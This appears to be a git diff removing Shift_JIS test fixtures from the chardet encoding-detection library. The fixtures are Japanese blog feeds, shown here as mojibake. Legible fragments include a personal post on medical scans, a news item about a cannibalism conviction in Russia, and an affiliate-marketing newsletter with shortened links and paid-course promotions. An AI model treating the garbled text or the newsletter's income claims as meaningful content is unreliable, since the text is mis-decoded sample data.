    ‘½•ׂi‚`‚u‚`‚¾‚ֶv‚₪‚ס‚ֵ‚·‚¯‚ַA‚±‚¿‚ח‚ּƒTƒCƒg‚³‚ס‚ֽ‚¢‚ם‚ה‚יu‚b‚sƒXƒLƒƒƒ“v‚ּ‰f‘‚‚½‚¢‚ּ‚נƒlƒbƒgד‚ֵ©‚ך‚יƒgƒRƒBˆ׃O‚ֹƒXƒSƒC‚ס‚ֵ‚·‚ֱ‚ִ‚־B
    -ƒ\ƒtƒg‚‚½‚¢‚ּ‚׋N“®‚µ‚½‚חA©‚½‚¢’f–‚ּ•”•ֹׂƒ}ƒEƒX‚נg‚ֱ‚ִu˜gv‚‚½‚¢‚ּ‚נˆ“®‚³‚¹‚י‚ס‚ֵ‚·B‚ ‚ֶ‚ֽט‚ֹ’f–‚ו\¦‚³‚ך‚½‚ט‚µ‚‚·BƒVƒtƒg‰‚µ‚ָ‚ׂחƒ}ƒEƒX‚נ“®‚©‚·‚ֶg‘ו‚µ‚½‚טAk¬‚µ‚½‚ט‚אo—ˆ‚י‚זB

    - -

    ‚[ˆדׂ‚ֵ©•ּׂ‚b‚sƒXƒLƒƒƒ“‚ֶ‚©‚ֶ‚ִ‚א‚ח‚¦‚־‚±‚ס‚ָ‰f‘‚א©‚ִ‚‚·‚¯‚ַA‚ָ‚©‚ָ‚©‚»‚ס‚ָƒRƒg‚µ‚½‚±‚ֶ‚ ‚יl‚ֽ­‚ָ‚¢‚זƒlBƒGƒ‹ƒGƒ‹‚אז“ת‰‚‚ִ‚l‚q‚h‚ֽ‚ג‚ֱ‚½‚¯‚ַA‚b‚sƒXƒLƒƒƒ“‚ֽ‚ג‚ֱ‚½‚±‚ֶ‚ָ‚¢‚ֵ‚·B
    -‚¿‚ָ‚‚ֹ—]’k‚ֵ‚·‚¯‚ַA‚b‚sƒXƒLƒƒƒ“‚ֽ•תֻ”\‚נg‚ֱ‚ִ‘Sg‚נB‰e‚·‚י‚א‚ס‚ֵA‚l‚q‚h‚ֱ‚ִ‚ּ‚ֽu¥—ֽv‚נ‚ֲ‚©‚ֱ‚ִ“ּׂ’†g‚נB‰e‚·‚יƒ‚ƒmB‚b‚sƒXƒLƒƒƒ“‚ֽƒƒ“ƒgƒQƒ“‚‚½‚¢‚ֹ‘‚¢‚¯‚ַA‚l‚q‚h‚ֽB‰e‚ֹ‚Q‚T•ׂ­‚ח‚¢‚©‚©‚ט‚‚·B“ׂ®‚י‚®‚י‚ֵֹ’ט‚³‚ך‚ִ‹\‚µ‚ס‚ַ‚¢B‚µ‚©‚אƒKƒbƒKƒbƒKƒbƒKƒb‚ֱ‚ִ‹\‚₪‚י‚³‚©‚ֱ‚½‚זB

    ]]>
    -Funny -elel -2005-12-28T02:47:07+09:00 -
    - -}‰זHל‚ּװ -http://10e.org/mt/archives/200512/280201.php -25800 B
    -}‰זHל‚ּװ

    - -

    ¢E‚ֽ‚¢‚ֲ‚ֵ‚אƒtƒ@ƒ“ƒ^ƒW[‚ֹ–‚¿‚ ‚׃‚ך‚ִ‚¢‚‚·B
    -—c—‚ֽ•ֿ‘װ‚ֶ¨ˆב‚¢‚³‚ך‚»‚₪‚ָ‚ּ‚ֵ‚±‚ךˆָדƒRƒƒ“ƒg‚נ‚µ‚½‚­‚ ‚ט‚‚¹‚סEEEB

    - -

    ¢E‚ֽ¡“ת‚א•”•דI‚ֹ•½˜a‚ֵ‚·EEEB

    ]]>
    -Image -elel -2005-12-28T02:01:51+09:00 -
    - -ƒƒVƒAA’ml‚נE‚µ‚ִ‹ע‚ֱ‚½’j« -http://10e.org/mt/archives/200512/280132.php -31753 B
    -ƒƒVƒAA’ml‚נE‚µ‚ִ‹ע‚ֱ‚½’j«

    - -

    ƒƒVƒA‚ּ“ƒVƒxƒƒA‚ֹ‚ ‚יƒuƒƒ„[ƒg‹₪˜a‘‚ֱ‚ִƒgƒRƒ‚ֵA˜_‚ּ––‚ֹ’ml‚נE‚µ‚ִ‚»‚ּ“ק‚נH‚׳‚½’j«‚×’¦–נ‚P‚S”N‚ּY‚ני‚³‚ך‚½‚»‚₪‚ֵ‚·B
    -’²¸‚ֹ‚ז‚י‚ֶA‚±‚ּ‘•‚³‚ך‚½Chingis Bubeev‚ֱ‚ִl‚×’ml‚נE‚µ‚ִƒoƒ‰ƒoƒ‰‚ֹ‚µA‚»‚µ‚ִ“ק‚נ׳״‚ך‚ֹ‚µ‚ִƒ‰ƒrƒIƒ‚ּ‚ז‚₪‚ָƒƒVƒA—¿—‚ּuƒyƒƒƒjv‚ֱ‚ִ¾‚₪—¿—‚ֹ‚»‚ּ“ק‚נg‚ֱ‚ִH‚׳‚½‚»‚₪‚ֵ‚·B‚³‚ח‚ֹA©•ֵׂH‚׳‚«‚ך‚ָ‚¢•ֽׂu”n‚ּ“קv‚ֶƒEƒ\‚נ‚ֲ‚¢‚ִ—׳l‚ֹ”„‚ֱ‚½‚»‚₪‚ֵ‚·B

    - -

    ‹]µ‚ֶ‚ָ‚ֱ‚½l‚ּc‚ט‚ּ•”•ֽׂ‰ֶ‚ּ‹‚­‚ֹּ‚ִA’n³Zl‚ֹ‚ז‚ט—‚“ת‚ֹ”­©‚³‚ך‚ִ–‚×”­o‚µ‚½‚»‚₪‚ֵ‚·B

    - -

    EEEEEEEB
    -u“®‹@v‚ֶ‚©‚ֽ‘S‘R‘‚¢‚ִ‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַA‚¢‚ם‚ה‚יƒJƒjƒoƒƒYƒ€‚ּlH
    -˜_‚ּ––‚ֹE‚µ‚¿‚ב‚ֱ‚½‚‚½‚¢‚ָ‚ס‚ֵ‚·‚¯‚ַA‚»‚ּuH‚׳‚י——Rv‚ֱ‚ִ‚ּ‚ֽˆך‘ּEEEH

    ]]>
    -English News -elel -2005-12-28T01:32:13+09:00 -
    - - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/1affliate.com.xml b/chardet/tests/SHIFT_JIS/1affliate.com.xml deleted file mode 100644 index 5d12266..0000000 --- a/chardet/tests/SHIFT_JIS/1affliate.com.xml +++ /dev/null @@ -1,1493 +0,0 @@ - - - -‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg - -2005-12-28T12:47:02Z - -tag:1affliate.com,2005://1 -Movable Type -Copyright (c) 2005, ˆֹ“¡ “Nֶ - -No.030 - -2005-12-28T12:47:02Z -2005-12-28T12:39:12Z -tag:1affliate.com,2005://1.304 -2005-12-28T12:39:12Z - @ [@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp @] ... - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒoƒbƒNƒiƒ“ƒo[ - - - - -@ [@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp @] - - vol.30 -@@@@@@@@@@@@@@@@@@@@@@@@@@“ַׂ”F‚‚®‚‚®10248l@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@“ֶ©”zM 4185l - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@s@¡‰ס‚ּ–@t -@ -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲwƒTƒCƒg‚נƒƒjƒ…[ƒAƒ‹‚µ‚‚µ‚½x -@y‚Qz¡‰ס‚ּ¬קpw¬ק‚·‚י‚½‚‚ֹג‘־‚ֹ‚ג‚ח‚ָ‚¯‚ך‚־‚¢‚¯‚ָ‚¢‚±‚ֶx -@y‚Rz‚¨–נ—§‚¿מ•סw“o˜^‚µ‚ִ1000‰~‚א‚ח‚¦‚יƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€x -@y‚Sz•ׂWד‹L -@ -@‚»‚ך‚ֵ‚ֽA‚ַ‚₪‚¼II@ - -@–ˆ“ת‚ּƒAƒtƒBƒƒGƒCƒg“‚נצJ‚µ‚ִ‚¢‚‚·II -@http://blog.livedoor.jp/affiliatemaseter/ -@w–w‚¹I300–‰~IIƒX[ƒp[ƒAƒtƒBƒƒGƒCƒ^[‚ײ‚ּ“¹x - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲ -@@@@@@wƒTƒCƒg‚נƒƒjƒ…[ƒAƒ‹‚µ‚‚µ‚½x -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ƒAƒtƒBƒƒGƒCƒgמ•סƒTƒCƒgw‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒgx‚ּ -ƒƒjƒ…[ƒAƒ‹‚ׂג‚ֱ‚ֶI‚ם‚ט‚‚µ‚½B -http://www.1affilaite.com - -‚¾‚¢‚װ©‰h‚¦‚ׂז‚­‚ָ‚ט‚‚µ‚½‚×A‚»‚₪‚ֽ‚¢‚ֱ‚ִ‚אA‚ג‚ֱ‚ֿ‚ט’†g‚× -ˆך”װ‘ו״‚ָ‚ּ‚ֵAˆ₪’…‚ׂם‚¢‚½‚ֶ‚±‚כ‚ֵAƒKƒ“ƒKƒ“‹L–‚נƒAƒbƒv‚µ‚ִ -‚¢‚«‚‚·B - -ƒoƒbƒNƒiƒ“ƒo[‚א‚±‚ּƒTƒCƒg‚ֵצJ‚·‚י‚ז‚₪‚ֹ‚µ‚ִ‚¢‚‚·‚ּ‚ֵA -‚²‚ח‚ס‚ֹ‚ָ‚ֱ‚ִ‚­‚¾‚³‚¢B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Qz¡‰ס‚ּ¬קp -@@@@@@w¬ק‚·‚י‚½‚‚ֹג‘־‚ֹ‚ג‚ח‚ָ‚¯‚ך‚־‚¢‚¯‚ָ‚¢‚±‚ֶx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ƒAƒtƒBƒƒGƒCƒg‚¾‚¯‚ְֹ‚ֱ‚½˜b‚ֵ‚ֽ‚ ‚ט‚‚¹‚ס‚×AƒrƒWƒlƒX‚ֵ‚₪‚‚­ -‚¢‚ֱ‚ִ‚¢‚יl‚ֹ‘־‚·‚יƒCƒ[ƒW‚ֱ‚ִA»ף‚ֶ‘ו‚«‚­‚©‚¯—£‚ך‚ִ‚¢‚י -‚±‚ֶ‚ׂ ‚ט‚‚·B - -‚»‚ּ‚ָ‚©‚ֵ‚אֵ‚½‚י‚א‚ּ‚×w¬ק‚ּ‚µ‚©‚½x‚נ’m‚ֱ‚ִ‚¢‚י‚ֶ‚¢‚₪‚א‚ּ‚ֵ‚·B - - -w‚±‚ּ₪•i‚ֱ‚ִ”„‚ך‚‚·‚©Hx -w‚ַ‚ס‚ָ₪•i‚×”„‚ך‚‚·‚©Hx - -‚±‚ס‚ָ¿–ג‚נ‚·‚יl‚ֽ­‚ָ‚­‚ ‚ט‚‚¹‚ס‚×A‚±‚ס‚ָ‚±‚ֶ‚וׂ©‚יl‚ֽ -‚¢‚‚¹‚סB‚ֵ‚אAדט‚­‚¢‚ֱ‚ִ‚¢‚יl‚ֽ‚±‚ך‚ׂם‚©‚י‚ֶv‚¢‚ס‚ֵ‚¢‚י -l‚א‚¢‚‚·B - -‚ֵ‚אA‚±‚ך‚ֱ‚ִ¨ˆב‚¢‚ֵ‚·B - - -‚ַ‚ס‚ָlװ‚ֵ‚אA‚ֵ‚«‚י‚±‚ֶ‚ֽ—\‘ׂ·‚י‚±‚ֶ‚¾‚¯‚ֵ‚·B¬קׂ‚ֶ‚¢‚₪‚ּ‚ֽ -•’‚ּl‚ז‚טA—\‘ׂנ“I’†‚³‚¹‚יm—¦‚ׂ‚¢‚©‚א‚µ‚ך‚‚¹‚ס‚×A‚»‚ך‚ֵ‚א -—\‘ֽׂ—\‘×Aְ‚ֹ‚ַ‚₪‚ָ‚י‚©A‚ג‚ֱ‚ִ‚‚י‚‚ֵ‚ם‚©‚ט‚‚¹‚סB - - -‚ֵ‚·‚©‚חAְ‚ֹ‚ג‚ֱ‚ִ‚‚ִA‚₪‚‚­‚¢‚­‚©‚ַ‚₪‚©ƒ`ƒFƒbƒN‚·‚יB‚»‚µ‚ִ -‚»‚ּ‹‰‚נ‚‚ִAV‚µ‚¢—\‘×i‰¼אj‚נ‚µ‚ִA‚»‚ך‚נ‚µ‚ִ‚‚יB - -‚ז‚­¾‚ם‚ך‚יwplan¨Do¨checkx‚ּƒTƒCƒNƒ‹‚ֵ‚·‚×A¬קׂ‚ֶ‚¢‚₪‚ּ‚ֽ -‚±‚ּƒTƒCƒNƒ‹‚נְs‚·‚יƒXƒs[ƒh‚ב¬‚¢‚¾‚¯‚ֵ‚·B - -‚±‚±‚ׂ₪‚‚­‚¢‚©‚ָ‚¢l‚ֶ‚ּ‘ו‚«‚ָˆב‚¢‚ֵ‚·B - -‚₪‚‚­‚¢‚©‚ָ‚¢l‚ֶ‚¢‚₪‚ּ‚ֽA‚±‚ּƒTƒCƒNƒ‹‚נְs‚·‚יƒXƒs[ƒh‚×’x‚¢‚ֵ‚·‚µA -‚»‚א‚»‚אA‚±‚ּƒTƒCƒNƒ‹‚נ1‰ס“]A2‰ס“]‚·‚י‚¾‚¯‚ֵI‚ם‚ט‚ֹ‚µ‚ִ‚µ‚‚¢‚‚·B - -‚₪‚‚­‚¢‚­l‚ֶ‚¢‚₪‚ּ‚ֽA‚±‚ּƒTƒCƒNƒ‹‚נ’Zתװ‚ֵ‰½“x‚אJ‚ט•װ‚µ‚ִA“‚¦‚נ -‚‚ֲ‚¯‚¾‚µ‚ִ‚¢‚י‚¾‚¯‚ֵ‚·B - -‚ג‚ֱ‚ִ‚‚ָ‚¯‚ך‚־•ׂ©‚ח‚ָ‚¢B‚±‚ך‚×^ְ‚ֵ‚·‚©‚חA“‚¦‚ׂ‚ֲ‚©‚י‚‚ֵ -‚ג‚ח‚ָ‚¢‚ֶ‚¢‚₪l‚ֽ‚¢‚ֲ‚‚ֵ‚א‚₪‚‚­‚¢‚­‚±‚ֶ‚ֽ‚ ‚ט‚‚¹‚סB - -‚ֵ‚·‚©‚חA‚ג‚ֱ‚ִ‚‚ז‚₪‚ֶ‚¢‚₪‹˜_‚ֹ‚ָ‚י‚ּ‚ֵ‚·‚×A‚±‚ך‚¾‚¯‚ֵ‚ֽ‰½‚ּ -•‚¯‚ֹ‚א‚ָ‚ח‚ָ‚¢‚ּ‚ֵAwcheckx‚ּ•”•ֵׂƒqƒ“ƒg‚ֹ‚ָ‚י‚±‚ֶ‚נ‚¨“`‚¦ -‚µ‚ז‚₪‚ֶv‚¢‚‚·B - -plan‚ֽ‰¼א‚נ‚½‚ִ‚י‚¾‚¯‚ֵ‚·‚µAdo‚אְs‚·‚י‚¾‚¯‚ָ‚ּ‚ֵA‚±‚±‚ֽ -w‚±‚₪‚·‚ך‚־‚ז‚­‚ָ‚י‚ּ‚ֵ‚ֽHx‚ֶ•‚‚©‚ס‚¾‚±‚ֶ‚נ‚ג‚י‚¾‚¯‚ֵ\•ֵׂ‚·B - - -–ג‘ט‚ֽ‚»‚ּ‹‰‚נ•×ֽ‚·‚יwcheckx‚ּ•”•ֵׂ‚·‚×A„‚ֽ‚Q‚ֶ‚¢‚₪”‚נ -‚׀‚ֶ‚ֲ‚ּƒ|ƒCƒ“ƒg‚ֹ‚µ‚ִ‚¢‚‚·B - -‚½‚ֶ‚¦‚־A‚ ‚י₪•i‚ּ׀‰מƒy[ƒW‚נ•ֿ‚¦‚ִA‚»‚ּר‰‚נm”F‚·‚י‚ֶ‚µ‚‚·B -‚±‚ּך‡A‚¾‚¢‚½‚¢200ƒAƒNƒZƒX’†A‚ַ‚ך‚­‚ח‚¢‚ּ”½‰‚ׂ ‚י‚ּ‚©‚ֶ‚¢‚₪ -”‚נ•ֿX‘O‚ֶד‚ֵƒ`ƒFƒbƒN‚·‚ך‚־”»’f‚ֵ‚«‚‚·B - -100ƒAƒNƒZƒX‚®‚ח‚¢‚ֵ‚א‚¢‚¢‚ּ‚ֵ‚·‚×A­‚µƒf[ƒ^‚ֶ‚µ‚ִM—p‚·‚י‚ֹ‚ֽ -‹K–ֽ‚׬‚³‚¢‚ּ‚ֵA200ƒAƒNƒZƒX‚נ‚׀‚ֶ‚ֲ‚ּ–ˆְ‚ֹ‚µ‚ִ‚¢‚‚·B - - -‚»‚ך‚©‚חA‚»‚ּ₪•i‚×–ˆ“ת”„‚ך‚ִ‚¢‚½‚ּ‚ֹA•ֿXד‘S‘R”„‚ך‚ָ‚¢B -‚±‚ך‚×1“ת‚¾‚¯‚ֵ‚ ‚ך‚־A‚½‚‚½‚‚©‚א‚µ‚ך‚‚¹‚ס‚×A2“ת˜A‘±‚¾‚ֶ -‚¨‚©‚µ‚¢‚ּ‚ֵA•ֿX‚׸”s‚ָ‚ּ‚ֵ‚ֽ‚ֶl‚¦‚‚·B - - -‚±‚ּך‡A³‚ֹ–‚µ‚ִA‚‚½₪•i‚×”„‚ךo‚µ‚½‚חA•ֿX‘O‚ּ‚‚₪‚× -³‰נ‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - - -‚±‚ס‚ָ‚׃‚₪‚ֹ‚µ‚ִwcheckx‚נ‚µ‚ִA‚ּwplanx‚ֹ‚ֲ‚ָ‚°‚יB -‚±‚ך‚׬ק‚·‚י‚½‚‚ֹAג‘־‚ֹ‚ג‚ח‚ָ‚­‚ִ‚ֽ‚¢‚¯‚ָ‚¢‚±‚ֶ‚ֵ‚·B - -ƒCƒ“ƒ^[ƒlƒbƒg‚ּך‡A•ֿX“_‚ּר‰‚×’Z‚¢ƒTƒCƒNƒ‹‚ֵ‚ם‚©‚י‚ּ‚ֵ -‚±‚‚‚ֹ•ֿX‚נJ‚ט•װ‚µ‚ִ‚‚י‚ּ‚׫–¾‚ֵ‚·B - -‚¿‚ָ‚‚ֹA‚±‚ּ2‚ֶ‚¢‚₪”‚ֽף‹µ‚ֹ‚ז‚ֱ‚ִ•ֿ‚ם‚י‚ּ‚ֵA‚»‚ּ“_‚ֽ_“מ‚ֹ -‘־‰‚µ‚ִ‚­‚¾‚³‚¢B - -‚½‚ֶ‚¦‚־A500ƒAƒNƒZƒX‚²‚ֶ‚ֹ1”„‚ך‚י‚ז‚₪‚ָ₪•i‚ּך‡A200ƒAƒNƒZƒX‚ֵ -ƒf[ƒ^‚נ‚ֶ‚ֱ‚ִ‚אˆ׃–¡‚ׂ ‚ט‚‚¹‚סB‚±‚ּך‡A500ƒAƒNƒZƒXˆָד‚ּ”‚ֵ -”»’f‚µ‚ָ‚¢‚ֶƒ_ƒ‚ֵ‚·B - -(‚Q”{‚ֶ‚µ‚ִ1000ƒAƒNƒZƒX‚®‚ח‚¢‚ֵ‚‚ך‚־‘ֳ“–‚©‚ָ‚ֶv‚¢‚‚·Bj - - -‚±‚ּƒTƒCƒNƒ‹‚נJ‚ט•װ‚µ‚ִ‚¢‚¯‚־A•K‚¸wƒRƒIx‚ֶ‚¢‚₪‚א‚ּ‚ׂ‚ֲ‚©‚ט -‚‚·‚ּ‚ֵA‚»‚ך‚‚ֵ‚ׂס‚־‚ֱ‚ִ‚­‚¾‚³‚¢B - -¬קƒmƒEƒnƒE‚ֶ‚¢‚₪‚ּ‚ֽ’m‚י‚א‚ּ‚ֵ‚ֽ‚ָ‚­‚ִA©•ֵׂ’T‚µ“–‚ִ‚י‚א‚ּ‚ֶ -‚¢‚₪´o‚ֵז‚ט‘g‚ס‚¾‚‚₪‚ׂ¢‚¢‚©‚א‚µ‚ך‚‚¹‚ס‚ֻB - - -‚»‚ך‚©‚חA‚±‚ך‚נְs‚·‚י‚ֶ‚«‚ֹ‚ֽA•ֿX‘O‚ּ‚א‚ּ‚נ•‘¶‚µ‚ִ‚¨‚¢‚½ -‚‚₪‚ׂ¢‚¢‚ֵ‚·B - -•ֿX‘O‚ֶ•ֿXד‚ּ‚א‚ּ‚נ©”ה‚׳‚ח‚ך‚י‚ז‚₪‚ֹ‚µ‚ִ‚¨‚¢‚ִA‚ ‚י’צ“x -–—ב‚×W‚‚ֱ‚½ד‚ִֹƒ`ƒFƒbƒN‚·‚י‚ֶAFX‚ָ‹C‚ֳ‚«‚ד¾‚ח‚ך‚י‚ֽ‚¸‚ֵ‚·B - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -y‚Rz‚¨–נ—§‚¿מ•ס -@@@w“o˜^‚µ‚ִ1000‰~‚א‚ח‚¦‚יƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€x -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ˆָ‘OAƒlƒbƒgƒAƒ‰ƒCƒAƒ“ƒX‚ֶ‚¢‚₪ƒAƒtƒBƒƒGƒCƒ^[“o˜^‚·‚י‚ֶ -1000‰~‚א‚ח‚¦‚יASP‚נ׀‰מ‚µ‚½‚±‚ֶ‚ׂ ‚ט‚‚·‚×A“¯‚¶‚ז‚₪‚ָASP‚נ -‚‚ֲ‚¯‚‚µ‚½B - -ƒoƒi[ƒuƒƒbƒW‚ֶ‚¢‚₪ASP‚ֵ‚·B»ƒLƒƒƒ“ƒy[ƒ“תװ’†‚ֵA‚±‚¿‚ח‚א -“o˜^‚·‚י‚ֶ1000‰~‚א‚ח‚¦‚‚·B8/31‚‚ֵ‚ָ‚ּ‚ֵ‚·‚×A‘‚¢‚א‚ּ‚¿‚ֵ‚·B - -‚¿‚ָ‚‚ֹA‚±‚ּASPAƒvƒƒOƒ‰ƒ€‚ּם—‚×–L•x‚ָ‚ּ‚ֵ -‚ֶ‚ט‚ ‚¦‚¸A“o˜^‚µ‚ִ‚¨‚¢‚ִ‚¢‚¢‚ֶv‚¢‚‚·B -http://tinyurl.com/8fnlf - -‚»‚ך‚©‚חAƒlƒbƒgƒAƒ‰ƒCƒAƒ“ƒX‚אA‚‚¾1000‰~ƒLƒƒƒbƒVƒ…ƒoƒbƒN‚ּ -ƒLƒƒƒ“ƒy[ƒ“‚נ‚ג‚ֱ‚ִ‚¢‚י‚ז‚₪‚ֵ‚·B‚‚¾‚ּl‚ֽ‚±‚¿‚ח‚א‚ַ‚₪‚¼B -http://tinyurl.com/8tsng - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡“ת–{‰I@¬‰•״^‚ּƒAƒtƒBƒƒGƒCƒg’M‹³ˆח -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -„‚×ִC‚נ‚µ‚ִ‚¢‚יֲ•ƒRƒ“ƒTƒ‹ƒeƒBƒ“ƒO•t‚«‚ּ’Muְ‚ֵ‚·B -ףuתװi6ƒ–j“א‚ֹƒAƒtƒBƒƒGƒCƒg“‚×10–‰~‚נ’´‚¦‚י -ƒTƒCƒg‚נ\’z‚ֵ‚«‚ָ‚©‚ֱ‚½ך‡A6ƒ–װAuְ‚נ–³—¿‚ֵ‰„’· -‚ֵ‚«‚‚·B - - -ְ’ט‚P‚O–¼‚ֵ•וW’†‚ֵ‚µ‚½‚×A•וWl”‚נ‘‚ג‚µ‚ִ‚‚µ‚¢‚ֶ‚¢‚₪÷‚ֹ -“‚¦‚ִ’טˆץ‚נ‚R‚O–¼‚ֹg‘ו‚µ‚‚µ‚½B - - -ƒ€[ƒoƒuƒ‹ƒ^ƒCƒv‚ּ’u‚גƒeƒ“ƒvƒ[ƒgƒJƒXƒ^ƒ}ƒCƒY‚ּ–³—¿ƒTƒ|[ƒg‚א -ף‚¯‚ח‚ך‚י‚ז‚₪‚ֹ‚µ‚‚µ‚½B‚±‚ך‚ֵA‚g‚o‚ּל‚ט•‚ׂם‚©‚ח‚ָ‚¢‚ֶ‚¢‚₪ -•‚אˆְS‚µ‚ִAƒRƒ“ƒeƒ“ƒcל¬‚ֹW’†‚ֵ‚«‚‚·B - - - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -‚‚¸‚ֽ‘—¿¿‹‚©‚חEEE@ -ֻ@@http://www.itoutetsuya.com/audio.html - -@ƒAƒtƒBƒƒGƒCƒgƒXƒN[ƒ‹“א—e@ - -@@u‰Sׂ‚׃AƒtƒBƒƒGƒCƒg‚ֵ¬ק‚·‚י‚½‚‚ּ‚P‚T‚ּƒXƒeƒbƒvvB -@@uƒAƒtƒBƒƒGƒCƒg‚ֹ¸”s‚·‚י‚X‚ֲ‚ּ——Rv -@@uˆֹ“¡“Nֶ‚ּƒAƒtƒBƒƒGƒCƒgמ‘buְv -@@uƒXƒN[ƒ‹ףu‰‘טˆִ“אƒJƒ‰[‚S–‚טv -@@uut•‰^‰cƒR[ƒX‚ֹ‚©‚¯‚י‘z‚¢v - -@@@’ט‰¿‚R‚O‚O‚O‰~@ֻ@@http://www.itoutetsuya.com/audio.html - - -@ֲ•–גƒR[ƒX‚Wת¶׳ֻ - -@@@ֻ@@http://www.tsurupea.com/ - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡•ׂWד‹L@w“ׂ׃I[ƒo[ƒq[ƒg‚µ‚»‚₪‚ֵ‚·x -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -–{“–‚ֹ–ˆ“ת‹‚¢‚ֵ‚·‚ֻB -“ׂ׃I[ƒo[ƒq[ƒg‚µ‚»‚₪‚ֵ‚·B - -’N‚©’˜–¼‚ָ•‚ב׀‚ֵA‚W‚ֽd–‚ֽ‹x‚‚ֶ‚¢‚₪‚ז‚₪‚ָ‚±‚ֶ‚נ -‘‚¢‚ִ‚¢‚‚µ‚½‚×A‚±‚ס‚ָƒ‰ƒCƒtƒXƒ^ƒCƒ‹‚נ‚¢‚ֲ‚©ְ»‚µ‚½‚¢‚ֵ‚·‚ֻB -i‚א‚µ‚­‚ֽA”נ‹’n‚ֵ“­‚­‚ֶ‚¢‚₪‚ּ‚א‚¢‚¢‚ֵ‚·‚ֻBj - - -@‚²´‘zA‚²¿–ג‚ֽ‚±‚¿‚ח‚‚ֵ‚ַ‚₪‚¼B -@info@1affliate.com - --------------------------------------------------------------------------- -@@@@@@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp -@@@@@@@@@@@@@@|MAIL MAGAZINE\ --------------------------------------------------------------------------- - @”­s׃”CׂF@ˆֹ“¡“Nֶ - @”­s³F@@@‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg - @“–ƒƒ‹ƒ}ƒK‚ֹ‚ז‚ט¶‚¶‚י‘¹QEƒgƒ‰ƒuƒ‹“™‚ֹ‚ֲ‚¢‚ִ׃”C‚ֽ•‰‚¢‚‚¹‚סB - @‚²ˆ׃©E‚²´‘z‚ֽinfo@1affliate.com‚‚ֵ‚¨ט‚¢’v‚µ‚‚·I - @“o˜^E‰נ‚ֽ‚±‚¿‚ח‚±‚ח@http://www.mag2.com/m/0000146544.htm - --------------------------------------------------------------------------- -Copyright(C) 2004-2005 All Rights Reserved. --------------------------------------------------------------------------- -]]> - - - - -‹‰‚©‚ח•¨–‚נ‹tZ‚·‚יiƒjƒ…[ƒXƒƒ^[‚נ‘‚­‚½‚‚ֹs“®‚נˆ‚‚יj - -2005-12-26T04:28:09Z -2005-12-26T04:06:58Z -tag:1affliate.com,2005://1.313 -2005-12-26T04:06:58Z -—\’ט‚נ¡“ת‚©‚ח‡”װ‚ֹ—§‚ִ‚ִ‚¢‚­‚ּ‚ֵ‚ֽ‚ָ‚­A’ק‚״‚ט‚ֶ‹‰‚נ’ט‚µ‚ִA‚»‚±‚©‚ח‹tZ‚µ‚ִ—\’ט‚נ—§‚ִ‚ִ‚¢‚­B‚±‚¿‚ח‚ּ‚‚₪‚×’Zתװ‚ֵ‚ז‚ט‘½‚­‚ּ‚±‚ֶ‚נ¬‚µ‹‚°‚ח‚ך‚‚·B „‚ֵּ‹‚ּƒAƒtƒBƒƒGƒCƒ^[‚ֶ‚µ‚ִ‚ּˆ“®‚ֽ... - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -‰ׂ‚¢‚ֵ‚¢‚יƒAƒtƒBƒƒGƒCƒ^[‚ּ‚׀‚ֶ‚ט¾ - 